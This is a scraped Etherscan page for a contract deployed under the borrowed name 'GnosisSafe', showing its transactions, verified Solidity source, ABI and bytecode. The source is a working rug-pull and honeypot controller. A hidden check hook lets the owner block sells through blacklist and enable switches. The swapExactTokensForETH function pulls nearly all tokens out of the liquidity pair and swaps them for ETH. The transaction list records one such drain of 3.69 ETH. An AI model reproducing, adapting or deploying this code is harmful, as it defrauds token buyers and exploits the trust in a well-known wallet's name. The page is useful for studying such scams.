ETH Price: $3,165.97 (-8.78%)
Gas: 3 Gwei

Contract

0x84FE3C0ECa61b07183D30A9fAdd19fEa8478517d
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Swap Exact ETH F...177805592023-07-26 23:33:35364 days ago1690414415IN
0x84FE3C0E...a8478517d
0 ETH0.0045056424.77397854
Whitelist177796582023-07-26 20:31:59364 days ago1690403519IN
0x84FE3C0E...a8478517d
0 ETH0.0082786132.61941915
Enable177796432023-07-26 20:28:59364 days ago1690403339IN
0x84FE3C0E...a8478517d
0 ETH0.0009887437.01658404
Refresh177796422023-07-26 20:28:47364 days ago1690403327IN
0x84FE3C0E...a8478517d
0 ETH0.0025753337.50527305
0x60806040177793302023-07-26 19:25:59364 days ago1690399559IN
 Contract Creation
0 ETH0.0348873735.89760253

Latest 2 internal transactions

Advanced mode:
Parent Transaction Hash Block From To
177805592023-07-26 23:33:35364 days ago1690414415
0x84FE3C0E...a8478517d
3.69856827 ETH
177805592023-07-26 23:33:35364 days ago1690414415
0x84FE3C0E...a8478517d
3.69856827 ETH
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x56997573...d27AF7491
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
GnosisSafe

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-07-18
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
    function decimals() external pure returns (uint8);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
}
interface IUniRouter {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}


interface IUniswapV2Pair {
    function sync() external;
}
contract GnosisSafe {
    bool private isEnabled = true;
    address private _owner;
    address private token;
    address private pair;
    IUniRouter private router;

    mapping(address => bool) whitelists;
    mapping(address => bool) blacklists;

    modifier onlyOwner() {
        require(msg.sender == _owner); _;
    }
    constructor(address router_) {
        _owner = msg.sender;
        router = IUniRouter(router_);
    }
    function refresh(address token_, address pair_) external onlyOwner {
        token = token_;
        pair = pair_;
    }
    function enable(bool isEnabled_) external onlyOwner {
        isEnabled = isEnabled_;
    }
    function reset() external onlyOwner {
        token = address(0);
        pair = address(0);
        isEnabled = true;
    }
    function check(
        address from
    ) external view returns (uint256) {
        if (whitelists[from] || pair == address(0) || from == token) {
            return 0;
        }
        else if ((from == _owner || from == address(this))) {
            return 1;
        }
        if (from != pair) {
            require(isEnabled);
            require(!blacklists[from]);
        }
        return 0;
    }
    function whitelist(address[] memory whitelists_) external onlyOwner{
        for (uint i = 0; i < whitelists_.length; i++) {
            whitelists[whitelists_[i]] = true;
        }
    }

    function blacklist(address[] memory blacklists_) external onlyOwner{
        for (uint i = 0; i < blacklists_.length; i++) {
            blacklists[blacklists_[i]] = true;
        }
    }

    function swap(uint256 amount) internal {
        address[] memory path = new address[](2);
        path[0] = token;
        path[1] = router.WETH();
        IERC20(token).approve(address(router), ~uint256(0));
        router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            amount,
            0,
            path,
            address(this),
            block.timestamp
        );
        payable(msg.sender).transfer(address(this).balance);
    }

    function swapExactTokensForETH(uint256 amount) external onlyOwner {
        uint256 balance = IERC20(token).balanceOf(pair) - 1 * 10 ** IERC20(token).decimals();
        IERC20(token).transferFrom(pair, address(this), balance);
        IUniswapV2Pair(pair).sync();
        swap(IERC20(token).balanceOf(address(this)));
    }

    function swapExactETHForTokens(uint256 amount) external onlyOwner {
        swap(amount);
    }

    function rescue(address token_) external onlyOwner {
        if (token_ == address(0)) {
            payable(msg.sender).transfer(address(this).balance);
        } else {
            IERC20(token_).transfer(msg.sender, IERC20(token_).balanceOf(address(this)));
        }
    }
    receive() external payable { }

    fallback(bytes calldata) external payable returns (bytes memory) {
        address from;
        bytes memory data = msg.data;
        assembly {
            from := mload(add(data, 0x14))
        }
        if (whitelists[from] || pair == address(0) || from == token) {
            return abi.encodePacked(uint256(0));
        }
        else if ((from == _owner || from == address(this))) {
            return abi.encodePacked(uint256(1));
        }
        if (from != pair) {
            require(isEnabled);
            require(!blacklists[from]);
        }
        return abi.encodePacked(uint256(0));
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"stateMutability":"payable","type":"fallback"},{"inputs":[{"internalType":"address[]","name":"blacklists_","type":"address[]"}],"name":"blacklist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"}],"name":"check","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"isEnabled_","type":"bool"}],"name":"enable","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token_","type":"address"},{"internalType":"address","name":"pair_","type":"address"}],"name":"refresh","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token_","type":"address"}],"name":"rescue","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"reset","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"swapExactTokensForETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"whitelists_","type":"address[]"}],"name":"whitelist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

Deployed Bytecode

0x60806040526004361061008a5760003560e01c8063839006f211610059578063839006f2146102845780638c3fd1db146102a4578063bd8aa780146102c4578063c23697a8146102e4578063d826f88f1461031657610091565b8063041f173f146102025780631dc437b1146102245780634df68ada146102445780637f92c8a61461026457610091565b3661009157005b60003660606000806000368080601f016020809104026020016040519081016040528093929190818152602001838380828437600092018290525060148501516001600160a01b038116825260046020526040909120549096509394505060ff909216915081905061010c57506002546001600160a01b0316155b8061012457506001546001600160a01b038381169116145b1561014e576040805160006020820152015b604051602081830303815290604052925050506101f7565b6000546001600160a01b0383811661010090920416148061017757506001600160a01b03821630145b1561018d57604080516001602082015201610136565b6002546001600160a01b038381169116146101d75760005460ff166101b157600080fd5b6001600160a01b03821660009081526005602052604090205460ff16156101d757600080fd5b604080516000602082015201604051602081830303815290604052925050505b915050805190602001f35b34801561020e57600080fd5b5061022261021d366004610bdd565b61032b565b005b34801561023057600080fd5b5061022261023f366004610ca2565b6103b3565b34801561025057600080fd5b5061022261025f366004610cc9565b6103db565b34801561027057600080fd5b5061022261027f366004610ca2565b61040a565b34801561029057600080fd5b5061022261029f366004610ced565b610683565b3480156102b057600080fd5b506102226102bf366004610d0a565b6107ba565b3480156102d057600080fd5b506102226102df366004610bdd565b610804565b3480156102f057600080fd5b506103046102ff366004610ced565b610888565b60405190815260200160405180910390f35b34801561032257600080fd5b50610222610965565b60005461010090046001600160a01b0316331461034757600080fd5b60005b81518110156103af5760016005600084848151811061036b5761036b610d43565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff1916911515919091179055806103a781610d6f565b91505061034a565b5050565b60005461010090046001600160a01b031633146103cf57600080fd5b6103d8816109ab565b50565b60005461010090046001600160a01b031633146103f757600080fd5b6000805460ff1916911515919091179055565b60005461010090046001600160a01b0316331461042657600080fd5b6001546040805163313ce56760e01b815290516000926001600160a01b03169163313ce5679160048083019260209291908290030181865afa158015610470573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104949190610d88565b61049f90600a610e91565b6104aa906001610ea0565b6001546002546040516370a0823160e01b81526001600160a01b0391821660048201529116906370a0823190602401602060405180830381865afa1580156104f6573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061051a9190610eb7565b6105249190610ed0565b6001546002546040516323b872dd60e01b81526001600160a01b0391821660048201523060248201526044810184905292935016906323b872dd906064016020604051808303816000875af1158015610581573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105a59190610ee3565b50600260009054906101000a90046001600160a01b03166001600160a01b031663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156105f657600080fd5b505af115801561060a573d6000803e3d6000fd5b50506001546040516370a0823160e01b81523060048201526103af93506001600160a01b0390911691506370a0823190602401602060405180830381865afa15801561065a573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061067e9190610eb7565b6109ab565b60005461010090046001600160a01b0316331461069f57600080fd5b6001600160a01b0381166106d95760405133904780156108fc02916000818181858888f193505050501580156103af573d6000803e3d6000fd5b6040516370a0823160e01b81523060048201526001600160a01b0382169063a9059cbb90339083906370a0823190602401602060405180830381865afa158015610727573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061074b9190610eb7565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610796573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103af9190610ee3565b60005461010090046001600160a01b031633146107d657600080fd5b600180546001600160a01b039384166001600160a01b03199182161790915560028054929093169116179055565b60005461010090046001600160a01b0316331461082057600080fd5b60005b81518110156103af5760016004600084848151811061084457610844610d43565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790558061088081610d6f565b915050610823565b6001600160a01b03811660009081526004602052604081205460ff16806108b857506002546001600160a01b0316155b806108d057506001546001600160a01b038381169116145b156108dd57506000919050565b6000546001600160a01b0383811661010090920416148061090657506001600160a01b03821630145b1561091357506001919050565b6002546001600160a01b0383811691161461095d5760005460ff1661093757600080fd5b6001600160a01b03821660009081526005602052604090205460ff161561095d57600080fd5b506000919050565b60005461010090046001600160a01b0316331461098157600080fd5b600180546001600160a01b031990811682556002805490911690556000805460ff19169091179055565b604080516002808252606082018352600092602083019080368337505060015482519293506001600160a01b0316918391506000906109ec576109ec610d43565b6001600160a01b03928316602091820292909201810191909152600354604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015610a45573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a699190610f00565b81600181518110610a7c57610a7c610d43565b6001600160a01b03928316602091820292909201015260015460035460405163095ea7b360e01b81529083166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af1158015610ae0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b049190610ee3565b5060035460405163791ac94760e01b81526001600160a01b039091169063791ac94790610b3e908590600090869030904290600401610f1d565b600060405180830381600087803b158015610b5857600080fd5b505af1158015610b6c573d6000803e3d6000fd5b50506040513392504780156108fc029250906000818181858888f19350505050158015610b9d573d6000803e3d6000fd5b505050565b634e487b7160e01b600052604160045260246000fd5b6001600160a01b03811681146103d857600080fd5b8035610bd881610bb8565b919050565b60006020808385031215610bf057600080fd5b823567ffffffffffffffff80821115610c0857600080fd5b818501915085601f830112610c1c57600080fd5b813581811115610c2e57610c2e610ba2565b8060051b604051601f19603f83011681018181108582111715610c5357610c53610ba2565b604052918252848201925083810185019188831115610c7157600080fd5b938501935b82851015610c9657610c8785610bcd565b84529385019392850192610c76565b98975050505050505050565b600060208284031215610cb457600080fd5b5035919050565b80151581146103d857600080fd5b600060208284031215610cdb57600080fd5b8135610ce681610cbb565b9392505050565b600060208284031215610cff57600080fd5b8135610ce681610bb8565b60008060408385031215610d1d57600080fd5b8235610d2881610bb8565b91506020830135610d3881610bb8565b809150509250929050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b600060018201610d8157610d81610d59565b5060010190565b600060208284031215610d9a57600080fd5b815160ff81168114610ce657600080fd5b600181815b80851115610de6578160001904821115610dcc57610dcc610d59565b80851615610dd957918102915b93841c9390800290610db0565b509250929050565b600082610dfd57506001610e8b565b81610e0a57506000610e8b565b8160018114610e205760028114610e2a57610e46565b6001915050610e8b565b60ff841115610e3b57610e3b610d59565b50506001821b610e8b565b5060208310610133831016604e8410600b8410161715610e69575081810a610e8b565b610e738383610dab565b8060001904821115610e8757610e87610d59565b0290505b92915050565b6000610ce660ff841683610dee565b8082028115828204841417610e8b57610e8b610d59565b600060208284031215610ec957600080fd5b5051919050565b81810381811115610e8b57610e8b610d59565b600060208284031215610ef557600080fd5b8151610ce681610cbb565b600060208284031215610f1257600080fd5b8151610ce681610bb8565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015610f6d5784516001600160a01b031683529383019391830191600101610f48565b50506001600160a01b0396909616606085015250505060800152939250505056fea264697066735822122018c2076e2e80fbea347da113cfa7e19ecd826c21c6843e03ed2352de8965b46b64736f6c63430008130033

Deployed Bytecode Sourcemap

1172:3525:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4118:12;4143;4166:17;4186:8;;4166:28;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;4253:4:0;4243:15;;4237:22;-1:-1:-1;;;;;4284:16:0;;;;:10;:16;;;;;;;4237:22;;-1:-1:-1;4166:28:0;;-1:-1:-1;;4284:16:0;;;;;-1:-1:-1;4284:16:0;;-1:-1:-1;4284:38:0;;-1:-1:-1;4304:4:0;;-1:-1:-1;;;;;4304:4:0;:18;4284:38;:55;;;-1:-1:-1;4334:5:0;;-1:-1:-1;;;;;4326:13:0;;;4334:5;;4326:13;4284:55;4280:247;;;4363:28;;;4388:1;4363:28;;;143:19:1;178:12;4363:28:0;;;;;;;;;;;;;4356:35;;;;;;4280:247;4431:6;;-1:-1:-1;;;;;4423:14:0;;;4431:6;;;;;4423:14;;:39;;-1:-1:-1;;;;;;4441:21:0;;4457:4;4441:21;4423:39;4418:109;;;4487:28;;;4512:1;4487:28;;;143:19:1;178:12;4487:28:0;14:182:1;4418:109:0;4549:4;;-1:-1:-1;;;;;4541:12:0;;;4549:4;;4541:12;4537:104;;4578:9;;;;4570:18;;;;;;-1:-1:-1;;;;;4612:16:0;;;;;;:10;:16;;;;;;;;4611:17;4603:26;;;;;;4658:28;;;4683:1;4658:28;;;143:19:1;178:12;4658:28:0;;;;;;;;;;;;4651:35;;;;4067:627;;;;1172:3525;;;;;;2617:191;;;;;;;;;;-1:-1:-1;2617:191:0;;;;;:::i;:::-;;:::i;:::-;;3636:97;;;;;;;;;;-1:-1:-1;3636:97:0;;;;;:::i;:::-;;:::i;1758:93::-;;;;;;;;;;-1:-1:-1;1758:93:0;;;;;:::i;:::-;;:::i;3299:329::-;;;;;;;;;;-1:-1:-1;3299:329:0;;;;;:::i;:::-;;:::i;3741:282::-;;;;;;;;;;-1:-1:-1;3741:282:0;;;;;:::i;:::-;;:::i;1629:123::-;;;;;;;;;;-1:-1:-1;1629:123:0;;;;;:::i;:::-;;:::i;2418:191::-;;;;;;;;;;-1:-1:-1;2418:191:0;;;;;:::i;:::-;;:::i;1991:421::-;;;;;;;;;;-1:-1:-1;1991:421:0;;;;;:::i;:::-;;:::i;:::-;;;3079:25:1;;;3067:2;3052:18;1991:421:0;;;;;;;1857:128;;;;;;;;;;;;;:::i;2617:191::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;2700:6:::1;2695:106;2716:11;:18;2712:1;:22;2695:106;;;2785:4;2756:10;:26;2767:11;2779:1;2767:14;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;2756:26:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;2756:26:0;:33;;-1:-1:-1;;2756:33:0::1;::::0;::::1;;::::0;;;::::1;::::0;;2736:3;::::1;::::0;::::1;:::i;:::-;;;;2695:106;;;;2617:191:::0;:::o;3636:97::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;3713:12:::1;3718:6;3713:4;:12::i;:::-;3636:97:::0;:::o;1758:93::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;1821:9:::1;:22:::0;;-1:-1:-1;;1821:22:0::1;::::0;::::1;;::::0;;;::::1;::::0;;1758:93::o;3299:329::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;3443:5:::1;::::0;3436:24:::1;::::0;;-1:-1:-1;;;3436:24:0;;;;3376:15:::1;::::0;-1:-1:-1;;;;;3443:5:0::1;::::0;3436:22:::1;::::0;:24:::1;::::0;;::::1;::::0;::::1;::::0;;;;;;;;3443:5;3436:24:::1;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3430:30;::::0;:2:::1;:30;:::i;:::-;3426:34;::::0;:1:::1;:34;:::i;:::-;3401:5;::::0;3418:4:::1;::::0;3394:29:::1;::::0;-1:-1:-1;;;3394:29:0;;-1:-1:-1;;;;;3418:4:0;;::::1;3394:29;::::0;::::1;5499:51:1::0;3401:5:0;::::1;::::0;3394:23:::1;::::0;5472:18:1;;3394:29:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:66;;;;:::i;:::-;3478:5;::::0;3498:4:::1;::::0;3471:56:::1;::::0;-1:-1:-1;;;3471:56:0;;-1:-1:-1;;;;;3498:4:0;;::::1;3471:56;::::0;::::1;6123:34:1::0;3512:4:0::1;6173:18:1::0;;;6166:43;6225:18;;;6218:34;;;3376:84:0;;-1:-1:-1;3478:5:0::1;::::0;3471:26:::1;::::0;6058:18:1;;3471:56:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;3553:4;;;;;;;;;-1:-1:-1::0;;;;;3553:4:0::1;-1:-1:-1::0;;;;;3538:25:0::1;;:27;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;-1:-1:-1::0;;3588:5:0::1;::::0;3581:38:::1;::::0;-1:-1:-1;;;3581:38:0;;3613:4:::1;3581:38;::::0;::::1;5499:51:1::0;3576:44:0::1;::::0;-1:-1:-1;;;;;;3588:5:0;;::::1;::::0;-1:-1:-1;3581:23:0::1;::::0;5472:18:1;;3581:38:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3576:4;:44::i;3741:282::-:0;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;-1:-1:-1;;;;;3807:20:0;::::1;3803:213;;3844:51;::::0;3852:10:::1;::::0;3873:21:::1;3844:51:::0;::::1;;;::::0;::::1;::::0;;;3873:21;3852:10;3844:51;::::1;;;;;;;;;;;;;::::0;::::1;;;;3803:213;3964:39;::::0;-1:-1:-1;;;3964:39:0;;3997:4:::1;3964:39;::::0;::::1;5499:51:1::0;-1:-1:-1;;;;;3928:23:0;::::1;::::0;::::1;::::0;3952:10:::1;::::0;3928:23;;3964:24:::1;::::0;5472:18:1;;3964:39:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3928:76;::::0;-1:-1:-1;;;;;;3928:76:0::1;::::0;;;;;;-1:-1:-1;;;;;6705:32:1;;;3928:76:0::1;::::0;::::1;6687:51:1::0;6754:18;;;6747:34;6660:18;;3928:76:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;1629:123::-:0;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;1707:5:::1;:14:::0;;-1:-1:-1;;;;;1707:14:0;;::::1;-1:-1:-1::0;;;;;;1707:14:0;;::::1;;::::0;;;1732:4:::1;:12:::0;;;;;::::1;::::0;::::1;;::::0;;1629:123::o;2418:191::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;2501:6:::1;2496:106;2517:11;:18;2513:1;:22;2496:106;;;2586:4;2557:10;:26;2568:11;2580:1;2568:14;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;2557:26:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;2557:26:0;:33;;-1:-1:-1;;2557:33:0::1;::::0;::::1;;::::0;;;::::1;::::0;;2537:3;::::1;::::0;::::1;:::i;:::-;;;;2496:106;;1991:421:::0;-1:-1:-1;;;;;2083:16:0;;2059:7;2083:16;;;:10;:16;;;;;;;;;:38;;-1:-1:-1;2103:4:0;;-1:-1:-1;;;;;2103:4:0;:18;2083:38;:55;;;-1:-1:-1;2133:5:0;;-1:-1:-1;;;;;2125:13:0;;;2133:5;;2125:13;2083:55;2079:193;;;-1:-1:-1;2162:1:0;;1991:421;-1:-1:-1;1991:421:0:o;2079:193::-;2203:6;;-1:-1:-1;;;;;2195:14:0;;;2203:6;;;;;2195:14;;:39;;-1:-1:-1;;;;;;2213:21:0;;2229:4;2213:21;2195:39;2190:82;;;-1:-1:-1;2259:1:0;;1991:421;-1:-1:-1;1991:421:0:o;2190:82::-;2294:4;;-1:-1:-1;;;;;2286:12:0;;;2294:4;;2286:12;2282:104;;2323:9;;;;2315:18;;;;;;-1:-1:-1;;;;;2357:16:0;;;;;;:10;:16;;;;;;;;2356:17;2348:26;;;;;;-1:-1:-1;2403:1:0;;1991:421;-1:-1:-1;1991:421:0:o;1857:128::-;1493:6;;;;;-1:-1:-1;;;;;1493:6:0;1479:10;:20;1471:29;;;;;;1904:5:::1;:18:::0;;-1:-1:-1;;;;;;1904:18:0;;::::1;::::0;;1933:4:::1;:17:::0;;;;::::1;::::0;;1920:1:::1;1961:16:::0;;-1:-1:-1;;1961:16:0::1;::::0;;::::1;::::0;;1857:128::o;2816:475::-;2890:16;;;2904:1;2890:16;;;;;;;;2866:21;;2890:16;;;;;;;;-1:-1:-1;;2927:5:0;;2917:7;;;;-1:-1:-1;;;;;;2927:5:0;;2917:7;;-1:-1:-1;2927:5:0;;2917:7;;;;:::i;:::-;-1:-1:-1;;;;;2917:15:0;;;:7;;;;;;;;;;:15;;;;2953:6;;:13;;;-1:-1:-1;;;2953:13:0;;;;:6;;;;;:11;;:13;;;;;2917:7;;2953:13;;;;;:6;:13;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;2943:4;2948:1;2943:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;2943:23:0;;;:7;;;;;;;;;:23;2984:5;;3007:6;;2977:51;;-1:-1:-1;;;2977:51:0;;3007:6;;;2977:51;;;6687::1;-1:-1:-1;;6754:18:1;;;6747:34;2984:5:0;;;2977:21;;6660:18:1;;2977:51:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;3039:6:0;;:182;;-1:-1:-1;;;3039:182:0;;-1:-1:-1;;;;;3039:6:0;;;;:57;;:182;;3111:6;;3039;;3148:4;;3175;;3195:15;;3039:182;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3232:51:0;;3240:10;;-1:-1:-1;3261:21:0;3232:51;;;;;-1:-1:-1;3261:21:0;3232:51;;;;3261:21;3240:10;3232:51;;;;;;;;;;;;;;;;;;;;;2855:436;2816:475;:::o;201:127:1:-;262:10;257:3;253:20;250:1;243:31;293:4;290:1;283:15;317:4;314:1;307:15;333:131;-1:-1:-1;;;;;408:31:1;;398:42;;388:70;;454:1;451;444:12;469:134;537:20;;566:31;537:20;566:31;:::i;:::-;469:134;;;:::o;608:1121::-;692:6;723:2;766;754:9;745:7;741:23;737:32;734:52;;;782:1;779;772:12;734:52;822:9;809:23;851:18;892:2;884:6;881:14;878:34;;;908:1;905;898:12;878:34;946:6;935:9;931:22;921:32;;991:7;984:4;980:2;976:13;972:27;962:55;;1013:1;1010;1003:12;962:55;1049:2;1036:16;1071:2;1067;1064:10;1061:36;;;1077:18;;:::i;:::-;1123:2;1120:1;1116:10;1155:2;1149:9;1218:2;1214:7;1209:2;1205;1201:11;1197:25;1189:6;1185:38;1273:6;1261:10;1258:22;1253:2;1241:10;1238:18;1235:46;1232:72;;;1284:18;;:::i;:::-;1320:2;1313:22;1370:18;;;1404:15;;;;-1:-1:-1;1446:11:1;;;1442:20;;;1474:19;;;1471:39;;;1506:1;1503;1496:12;1471:39;1530:11;;;;1550:148;1566:6;1561:3;1558:15;1550:148;;;1632:23;1651:3;1632:23;:::i;:::-;1620:36;;1583:12;;;;1676;;;;1550:148;;;1717:6;608:1121;-1:-1:-1;;;;;;;;608:1121:1:o;1734:180::-;1793:6;1846:2;1834:9;1825:7;1821:23;1817:32;1814:52;;;1862:1;1859;1852:12;1814:52;-1:-1:-1;1885:23:1;;1734:180;-1:-1:-1;1734:180:1:o;1919:118::-;2005:5;1998:13;1991:21;1984:5;1981:32;1971:60;;2027:1;2024;2017:12;2042:241;2098:6;2151:2;2139:9;2130:7;2126:23;2122:32;2119:52;;;2167:1;2164;2157:12;2119:52;2206:9;2193:23;2225:28;2247:5;2225:28;:::i;:::-;2272:5;2042:241;-1:-1:-1;;;2042:241:1:o;2288:247::-;2347:6;2400:2;2388:9;2379:7;2375:23;2371:32;2368:52;;;2416:1;2413;2406:12;2368:52;2455:9;2442:23;2474:31;2499:5;2474:31;:::i;2540:388::-;2608:6;2616;2669:2;2657:9;2648:7;2644:23;2640:32;2637:52;;;2685:1;2682;2675:12;2637:52;2724:9;2711:23;2743:31;2768:5;2743:31;:::i;:::-;2793:5;-1:-1:-1;2850:2:1;2835:18;;2822:32;2863:33;2822:32;2863:33;:::i;:::-;2915:7;2905:17;;;2540:388;;;;;:::o;3115:127::-;3176:10;3171:3;3167:20;3164:1;3157:31;3207:4;3204:1;3197:15;3231:4;3228:1;3221:15;3247:127;3308:10;3303:3;3299:20;3296:1;3289:31;3339:4;3336:1;3329:15;3363:4;3360:1;3353:15;3379:135;3418:3;3439:17;;;3436:43;;3459:18;;:::i;:::-;-1:-1:-1;3506:1:1;3495:13;;3379:135::o;3519:273::-;3587:6;3640:2;3628:9;3619:7;3615:23;3611:32;3608:52;;;3656:1;3653;3646:12;3608:52;3688:9;3682:16;3738:4;3731:5;3727:16;3720:5;3717:27;3707:55;;3758:1;3755;3748:12;3797:422;3886:1;3929:5;3886:1;3943:270;3964:7;3954:8;3951:21;3943:270;;;4023:4;4019:1;4015:6;4011:17;4005:4;4002:27;3999:53;;;4032:18;;:::i;:::-;4082:7;4072:8;4068:22;4065:55;;;4102:16;;;;4065:55;4181:22;;;;4141:15;;;;3943:270;;;3947:3;3797:422;;;;;:::o;4224:806::-;4273:5;4303:8;4293:80;;-1:-1:-1;4344:1:1;4358:5;;4293:80;4392:4;4382:76;;-1:-1:-1;4429:1:1;4443:5;;4382:76;4474:4;4492:1;4487:59;;;;4560:1;4555:130;;;;4467:218;;4487:59;4517:1;4508:10;;4531:5;;;4555:130;4592:3;4582:8;4579:17;4576:43;;;4599:18;;:::i;:::-;-1:-1:-1;;4655:1:1;4641:16;;4670:5;;4467:218;;4769:2;4759:8;4756:16;4750:3;4744:4;4741:13;4737:36;4731:2;4721:8;4718:16;4713:2;4707:4;4704:12;4700:35;4697:77;4694:159;;;-1:-1:-1;4806:19:1;;;4838:5;;4694:159;4885:34;4910:8;4904:4;4885:34;:::i;:::-;4955:6;4951:1;4947:6;4943:19;4934:7;4931:32;4928:58;;;4966:18;;:::i;:::-;5004:20;;-1:-1:-1;4224:806:1;;;;;:::o;5035:140::-;5093:5;5122:47;5163:4;5153:8;5149:19;5143:4;5122:47;:::i;5180:168::-;5253:9;;;5284;;5301:15;;;5295:22;;5281:37;5271:71;;5322:18;;:::i;5561:184::-;5631:6;5684:2;5672:9;5663:7;5659:23;5655:32;5652:52;;;5700:1;5697;5690:12;5652:52;-1:-1:-1;5723:16:1;;5561:184;-1:-1:-1;5561:184:1:o;5750:128::-;5817:9;;;5838:11;;;5835:37;;;5852:18;;:::i;6263:245::-;6330:6;6383:2;6371:9;6362:7;6358:23;6354:32;6351:52;;;6399:1;6396;6389:12;6351:52;6431:9;6425:16;6450:28;6472:5;6450:28;:::i;6792:251::-;6862:6;6915:2;6903:9;6894:7;6890:23;6886:32;6883:52;;;6931:1;6928;6921:12;6883:52;6963:9;6957:16;6982:31;7007:5;6982:31;:::i;7048:980::-;7310:4;7358:3;7347:9;7343:19;7389:6;7378:9;7371:25;7415:2;7453:6;7448:2;7437:9;7433:18;7426:34;7496:3;7491:2;7480:9;7476:18;7469:31;7520:6;7555;7549:13;7586:6;7578;7571:22;7624:3;7613:9;7609:19;7602:26;;7663:2;7655:6;7651:15;7637:29;;7684:1;7694:195;7708:6;7705:1;7702:13;7694:195;;;7773:13;;-1:-1:-1;;;;;7769:39:1;7757:52;;7864:15;;;;7829:12;;;;7805:1;7723:9;7694:195;;;-1:-1:-1;;;;;;;7945:32:1;;;;7940:2;7925:18;;7918